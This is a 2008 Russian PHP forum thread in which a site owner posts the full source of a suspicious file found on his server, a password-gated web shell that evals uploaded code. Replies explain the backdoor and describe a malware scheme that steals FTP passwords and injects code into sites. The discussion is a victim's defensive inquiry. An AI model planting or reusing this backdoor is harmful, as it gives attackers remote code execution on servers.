Форум: Форум PHPФорум ApacheФорум Регулярные ВыраженияФорум MySQLHTML+CSS+JavaScriptФорум FlashРазное
Новые темы: 0000000
Самоучитель PHP 5 / 6 (3 издание). Авторы: Кузнецов М.В., Симдянов И.В. Социальная инженерия и социальные хакеры. Авторы: Кузнецов М.В., Симдянов И.В. Программирование. Ступени успешной карьеры. Авторы: Кузнецов М.В., Симдянов И.В. PHP 5/6. В подлиннике. Авторы: Кузнецов М.В., Симдянов И.В. PHP 5. На примерах. Авторы: Кузнецов М.В., Симдянов И.В., Голышев С.В.
ВСЕ НАШИ КНИГИ
Консультационный центр SoftTime

Форум PHP

Выбрать другой форум

 

Здравствуйте, Посетитель!

вид форума:
Линейный форум Структурный форум

тема: uqibi.php
 
 автор: ols   (19.12.2008 в 12:53)   письмо автору
 
 

Сегодня на своем сайте обнаружил скрипт uqibi.php, скинул себе по фтп его, попытался открыть, касперский сослался мол это троян. тогда отрубил защиту посмтрел, вот что в нем обнаружил

  <?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"?>                                                                    


Чтобы это значило и как скрипт мог оказаться у меня на сайте, пароли меняются часто.

  Ответить  
 
 автор: Valick   (19.12.2008 в 13:31)   письмо автору
 
   для: ols   (19.12.2008 в 12:53)
 

Ну раз сослался Касперский, то троян))
На вскидку этот скрипт исполняет код который хацкер аплодит вам на сервер.

К форме аплода добавьте скрытое поле name=p value='Ox93Mdpqme8s', а в загружаемом файле напишите echo 'привет' можт покажет чё нить

  Ответить  
 
 автор: ols   (19.12.2008 в 15:49)   письмо автору
 
   для: Valick   (19.12.2008 в 13:31)
 

В сети интернет появился новый тип вируса - Downloader.JS.Psyme.ct (возможны другия названия), распространяющий себя через веб-сайты. Схема заражения довольно проста: достаточно зайти на зараженный сайт и при стандартных настройках безопасности браузера, вирус автоматически установится на компьютере пользователя. После этого он начинает отслеживать логины и пароли от FTP, высылая их злоумышленникам. Собрав определенное количество паролей, запускается специальная программа, которая подключается по FTP к каждому сайту и встраивает в начало или конец страниц собственный html-код.

  Ответить  
Rambler's Top100
вверх

Rambler's Top100 Яндекс.Метрика Яндекс цитирования